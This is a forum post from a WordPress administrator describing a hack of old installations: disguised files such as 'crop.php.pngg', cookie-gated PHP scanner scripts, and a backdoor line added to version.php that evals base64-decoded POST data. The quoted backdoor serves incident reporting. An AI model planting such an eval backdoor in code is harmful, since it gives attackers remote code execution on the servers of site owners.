I've just found that a WordPress 2.3.3 installation I run seems to have been hacked. I'm in the middle of analyzing it, but I thought I'd post quickly here to see if anyone has had similar experiences and knows any more details. (Searching here and on Google hasn't really brought anything similar up but this guy is the closest I've found, and I'm not terribly familiar with hacking methods.)
The same thing has happened to a 2.1.2 on the same server. I know this should be upgraded - but the recent 2.5 upgrade warnings seemed to suggest that 2.3.3 was OK?
I've not noticed anything (yet) specifically damaged by the attack (no spam links, etc.), but here's what I've seen so far:
- Various files have been inserted throughout the installation, in each case they're named after an existing file or folder, slightly changed (e.g. crop.php.pngg and jquery_new.php.giff). It looks like all these contain the same PHP script, which looks like a generic thing to check the server for vulnerabilities (open ports, writable files, etc.). They all start if(md5($_COOKIE['qwerty'])==...
- version.php has been changed with a similar line to the above, this time just doing this instead:
eval(base64_decode($_POST['file'])); exit;
The result is that the blatantly old-style admin interface has "Version 2.5" at the bottom.
OK, looks like most WP files have similar code inserted. I'm not hanging around to find out what it's doing; I've backed up and deleted all files...
So, I guess I'll be paying this page muc h more attention now.
Anyone else have any other information on this specific attack?
